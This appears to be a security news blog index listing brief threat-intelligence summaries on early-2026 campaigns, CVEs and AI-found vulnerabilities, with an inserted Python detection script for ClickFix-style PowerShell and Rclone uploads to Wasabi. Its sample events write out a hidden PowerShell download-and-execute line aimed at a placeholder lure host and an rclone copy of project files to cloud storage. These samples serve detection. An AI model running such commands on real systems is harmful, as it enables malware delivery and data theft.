ALL POSTS
Anthropic's Claude Opus AI Model Outperforms Human Teams in Discovering Firefox Vulnerabilities
Key Findings Anthropic's AI model Claude Opus 4.6 discovered 22 security vulnerabilities in the Mozilla Firefox web browser over the course of two weeks. 14 of the 22 vulnerabilities were classified as high-severity, nearly a fifth of all high-severity Firefox issues fixed in 2025. Mozilla addressed the majority of these vulnerabilities in Firefox 148, released in January 2026. This demonstrates AI's growing capability to rapidly detect critical security flaws in complex soft
Mar 9 · 2 min read
Update: emldump.py Version 0.0.17
Background The emldump.py script is a tool used by security analysts and incident responders to extract and analyze the parts of email messages stored in EML (MIME) format. This update focuses on the "--yarastrings" option, which prints the strings matched when YARA rules are applied to the email data. Key Findings The update to emldump.py version 0.0.16 includes fixes and improvements to the "--yarastrings" option. The provided MD5 and SHA256 hash
Mar 9 · 1 min read
How AI Assistants are Redefining the Security Landscape
Key Findings: AI-based assistants ("agents") are growing in popularity, with the new OpenClaw AI assistant seeing rapid adoption. OpenClaw and other AI assistants can automate virtually any task, accessing the user's computer, files, online services, and integrations. Poorly secured AI assistants pose significant risks to organizations, with examples of AI agents accidentally deleting data or being exposed to the internet. Attacking misconfigured AI agent web interfaces can allow
Mar 8 · 2 min read
Nginx UI Vulnerability: CVE-2026-27944 Exposes Server Backups
Key Findings A critical vulnerability in Nginx UI, tracked as CVE-2026-27944, allows attackers to download and decrypt full server backups without authentication. The vulnerability stems from two major flaws: the /api/backup endpoint lacks authentication, and the server exposes the AES-256 encryption key and IV in an HTTP response header. Exploitation of the vulnerability could have serious consequences as a full Nginx UI backup contains large amounts of sensitive operational
Mar 8 · 2 min read
GitHub Malware Operation Spreads Dangerous BoryptGrab Stealer
Key Findings: The BoryptGrab information stealer is spreading through over 100 GitHub repositories. The malware is designed to collect browser data, cryptocurrency wallets, system details, and user files. Some variants deploy a PyInstaller backdoor called TunnesshClient for remote command execution. Background: Trend Micro has uncovered a campaign distributing the BoryptGrab information stealer through more than 100 GitHub repositories. BoryptGrab is capable of collecting sensitive data such as
Mar 8 · 1 min read
Hackers Abuse Red Alert App to Spy on Israeli Users
Key Findings Deceptive mobile campaign discovered targeting people in Israel using a fake version of the popular "Red Alert" life-saving app The app appears to be a modified version of the legitimate "Red Alert" app, which is widely used to provide real-time warnings about incoming rockets The attack starts with a simple text message claiming there is a technical problem with the current alert system and providing a link to download an updated version Background The "Red Aler
Mar 8 · 2 min read
Cyber Espionage: Iran-Backed Hackers Target IP Cameras in Israel and Gulf States
Key Findings: Iran-linked hackers targeted IP cameras across Israel and several Gulf countries, including the UAE, Qatar, Bahrain, and Kuwait, as well as Lebanon and Cyprus. The goal appears to be reconnaissance and real-time monitoring to support intelligence gathering and potential military targeting. Threat actors targeted vulnerabilities in Hikvision and Dahua IP cameras, such as improper authentication, command injection, and remote code execution flaws. Scanning and exp
Mar 8 · 2 min read
FBI Investigating Breach of Sensitive Surveillance System
Key Findings The FBI is investigating suspicious cyber activity affecting an internal system that stores sensitive data tied to surveillance operations and investigations. The affected system is unclassified but contains law enforcement-sensitive information, including data from legal tools like pen register and trap-and-trace orders, and personally identifiable information linked to investigations. The FBI has identified and addressed the suspicious activities, using all ava
Mar 7 · 2 min read
OpenAI Codex Security Agent Scans Millions of Commits, Uncovers High-Severity Issues
Key Findings OpenAI has launched Codex Security, an AI-powered security agent designed to find, validate, and propose fixes for software vulnerabilities. Over the last 30 days, Codex Security has scanned more than 1.2 million commits across external repositories, identifying 792 critical and 10,561 high-severity findings. The vulnerabilities found include issues in various open-source projects like OpenSSH, GnuTLS, GOGS, Thorium, libssh, PHP, and Chromium. Codex Security leve
Mar 7 · 2 min read
Microsoft says North Korea is using AI-powered fake IT workers to scale up scams
Key Findings North Korean threat groups are using artificial intelligence (AI) tools to accelerate and expand the country's long-running scheme to get remote technical workers hired at global companies. AI services are empowering North Korean operatives across the attack lifecycle, turning AI into a "force multiplier" for their efforts. Threat groups are using AI to shorten the time it takes to create digital personas for specific job markets and roles, leveraging financial o
Mar 7 · 3 min read
Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT
Key Findings: A multi-stage malware campaign codenamed VOID#GEIST delivers various remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT. The malware utilizes obfuscated batch scripts as a pathway to deploy and execute encrypted shellcode payloads. It leverages a legitimate embedded Python runtime for portability, reliability, and stealth, and employs fileless execution mechanisms and memory injection techniques to evade detection. Background: Cybersecurity researchers have
Mar 7 · 2 min read
Transparent Tribe Uses AI to Mass-Produce Malware Implants Targeting India
Key Findings Transparent Tribe, a Pakistan-aligned hacking group, has embraced the use of AI-powered coding tools to mass-produce malware implants. The goal is to flood target environments with a "high-volume, mediocre mass of implants" using lesser-known programming languages like Nim, Zig, and Crystal. These malware samples rely on trusted services like Slack, Discord, Supabase, and Google Sheets to fly under the radar, a technique dubbed "Distributed Denial of Detection (D
Mar 7 · 2 min read
Google GTIG Reveals 90 Zero-Day Flaws Exploited in 2025, Underscoring Increasing Attacks on Enterprise Targets
Key Findings: Google's Threat Intelligence Group (GTIG) identified 90 zero-day vulnerabilities exploited in the wild in 2025, up from 78 in 2024. Nearly half of the flaws (43, or 48%) targeted enterprise technologies, marking a record share and confirming a shift toward enterprise-focused attacks. Browser exploitation declined to historic lows, while operating system flaws were increasingly abused. Nation-state actors mainly targeted edge devices and security appliances, while co
Mar 6 · 2 min read
Dindoor Malware Targets U.S. Networks in New MuddyWater Campaign
Key Findings: The Iran-linked MuddyWater (aka SeedWorm) APT group targeted U.S. organizations, including banks, airports, nonprofits, and a software supplier to the defense and aerospace sectors. The group deployed a previously unknown backdoor called Dindoor, which leverages the Deno JavaScript runtime for execution. An attempt was made to exfiltrate data from the targeted software company using the Rclone utility to a Wasabi cloud storage bucket. A separate Python backdoor called F
Mar 6 · 2 min read
Microsoft Warns of ClickFix Using Windows Terminal to Distribute Lumma Stealer
Key Findings: Microsoft Defender experts uncovered a widespread ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer malware. The campaign instructs targets to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly, bypassing Run-dialog detections. Attackers guide users to paste malicious PowerShell commands from fake CAPTCHAs, troubleshooting prompts, or verification-style lures. The malicious payload downloads and executes a multi-st
Mar 6 · 2 min read
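Two of the behaviours summarized above lend themselves to simple process-creation detections: the ClickFix variant that has the victim launch PowerShell from Windows Terminal (Microsoft post), and Rclone pushing data to Wasabi object storage (MuddyWater/Dindoor post). The block below is an added example, not code from Microsoft, Symantec or any vendor report, and runs two such rules over constructed Sysmon-style event lines. The field names (Image, ParentImage, CommandLine, Computer), the indicator regexes, the hostnames and the lure URL are all assumptions made for this illustration; the Wasabi and Rclone markers it looks for (`wasabisys.com`, `--s3-provider Wasabi`) are real but only visible when the operator passes them on the command line rather than via a named remote in rclone.conf.

```python
"""Process-creation detections for two behaviours described on this page.

Rule 1 (ClickFix via Windows Terminal): PowerShell spawned by the Windows
Terminal host with download-and-execute indicators on its command line.
Windows Terminal starting PowerShell is normal, so the parent alone never
fires; an indicator on the command line is required.
Rule 2 (Rclone cloud upload): rclone invoked with an upload verb; the alert
is strengthened when Wasabi endpoint/provider markers appear.
Events are Sysmon Event ID 1-style JSON lines; the samples are constructed."""
import json
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, Iterable, Optional


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    reason: str
    command_line: str


def _base(path: str) -> str:
    # ntpath handles Windows separators regardless of the analyst's platform.
    return ntpath.basename(path).lower()


# wt.exe is the launcher alias; WindowsTerminal.exe is the hosting process
# that usually appears as the shell's parent, so both are accepted.
TERMINAL_HOSTS = {"wt.exe", "windowsterminal.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Indicators typical of ClickFix one-liners (assumed set, extend per environment).
PS_INDICATORS = {
    "encoded_command": re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web_download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

RCLONE_UPLOAD_VERBS = re.compile(r"\b(copy|copyto|sync|move|moveto)\b", re.I)
WASABI_MARKERS = re.compile(r"wasabisys\.com|--s3-provider[\s=]+wasabi", re.I)


def clickfix_terminal(ev: dict) -> Optional[str]:
    """Return a reason string when the event matches rule 1, else None."""
    if _base(ev.get("Image", "")) not in POWERSHELL:
        return None
    if _base(ev.get("ParentImage", "")) not in TERMINAL_HOSTS:
        return None
    cmd = ev.get("CommandLine", "")
    hits = [name for name, rx in PS_INDICATORS.items() if rx.search(cmd)]
    if not hits:
        return None
    return "PowerShell under Windows Terminal with " + ", ".join(hits)


def rclone_exfil(ev: dict) -> Optional[str]:
    """Return a reason string when the event matches rule 2, else None.
    Note: copy/sync also cover downloads; this is a triage signal, not proof."""
    if _base(ev.get("Image", "")) not in {"rclone.exe", "rclone"}:
        return None
    cmd = ev.get("CommandLine", "")
    if not RCLONE_UPLOAD_VERBS.search(cmd):
        return None
    reason = "rclone upload verb on the command line"
    if WASABI_MARKERS.search(cmd):
        reason += " targeting Wasabi object storage"
    return reason


RULES: list[tuple[str, Callable[[dict], Optional[str]]]] = [
    ("clickfix_windows_terminal", clickfix_terminal),
    ("rclone_cloud_upload", rclone_exfil),
]


def parse_events(jsonl: str) -> list[dict]:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def detect(events: Iterable[dict]) -> list[Alert]:
    alerts = []
    for ev in events:
        for name, rule in RULES:
            reason = rule(ev)
            if reason:
                alerts.append(Alert(name, ev.get("Computer", "?"), reason,
                                    ev.get("CommandLine", "")))
    return alerts


# Constructed sample events (hosts, paths and URL are placeholders).
SAMPLE_EVENTS = r"""
{"Computer": "WS-042", "ParentImage": "C:\\Program Files\\WindowsApps\\Terminal\\WindowsTerminal.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoLogo"}
{"Computer": "WS-042", "ParentImage": "C:\\Users\\dev\\AppData\\Local\\Microsoft\\WindowsApps\\wt.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -ep bypass -c \"iex (iwr 'http://lure.example.invalid/verify.txt' -UseBasicParsing)\""}
{"Computer": "SRV-07", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe copy C:\\Projects\\src wb:project-backup --s3-provider Wasabi --s3-endpoint s3.wasabisys.com -q"}
{"Computer": "SRV-07", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "Image": "C:\\Tools\\rclone.exe", "CommandLine": "rclone.exe lsd wb:"}
{"Computer": "WS-042", "ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c dir"}
"""


def run_sample() -> list[Alert]:
    return detect(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.rule}] {a.host}: {a.reason}\n    {a.command_line}")
```

Of the five constructed events only the second (hidden-window PowerShell with `iex`/`iwr` under wt.exe) and the third (`rclone copy` to a Wasabi remote) fire; the benign Windows Terminal session and the `rclone lsd` listing do not. In production, the Rclone rule should be paired with the endpoint found in the user's rclone.conf, since a named remote hides the provider from the command line.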
Dust Specter APT Targets Iraqi Government Officials with New AI-Assisted Malware
Key Findings Suspected Iran-nexus threat actor, tracked as "Dust Specter", targeted Iraqi government officials in a campaign observed in January 2026. The threat actor used phishing emails impersonating Iraq's Ministry of Foreign Affairs to deliver previously undocumented malware families, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attacks involved two different infection chains, one using a password-protected RAR archive and another consolidating the same fu
Mar 6 · 2 min read
Europol-Led Operation Disrupts Tycoon 2FA Phishing Scheme Linked to Thousands of Attacks
Key Findings Tycoon 2FA, a prominent Phishing-as-a-Service (PhaaS) platform, was dismantled by a coalition of law enforcement agencies and security companies led by Europol. The subscription-based phishing kit, which emerged in August 2023, was described as one of the largest phishing operations worldwide. Tycoon 2FA's primary developer is alleged to be Saad Fridi, who is said to be based in Pakistan. The platform enabled thousands of cybercriminals to covertly access email a
Mar 6 · 2 min read
APT28-Linked Campaign Targets Ukraine with Malware Threats
Key Findings: A new Russian cyber campaign has targeted Ukrainian entities with two previously undocumented malware families named BadPaw and MeowMeow. The campaign has been attributed with moderate confidence to the Russian state-sponsored threat actor known as APT28. The attack chain initiates with a phishing email containing a link to a ZIP archive, which leads to the deployment of a .NET-based loader called BadPaw and a sophisticated backdoor called MeowMeow. Background T
Mar 5 · 2 min read
Phobos Ransomware Operator Pleads Guilty, Faces Lengthy Prison Sentence
Key Findings: Evgenii Ptitsyn, a 43-year-old Russian national, pleaded guilty to wire fraud conspiracy for his role in the Phobos ransomware operation. Ptitsyn was a high-level administrator of the Phobos ransomware-as-a-service (RaaS) operation. The Phobos ransomware operation targeted over 1,000 public and private entities worldwide, extorting more than $16 million in ransom payments. Ptitsyn and his co-conspirators used a RaaS model to distribute Phobos ransomware to a net
Mar 5 · 2 min read
Malware Attacks: Russian APT Targets Ukraine with BadPaw and MeowMeow
Key Findings Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain. The malware uses the .NET Reactor packer to make analysis and reverse engineering harder, showing th
Mar 5 · 2 min read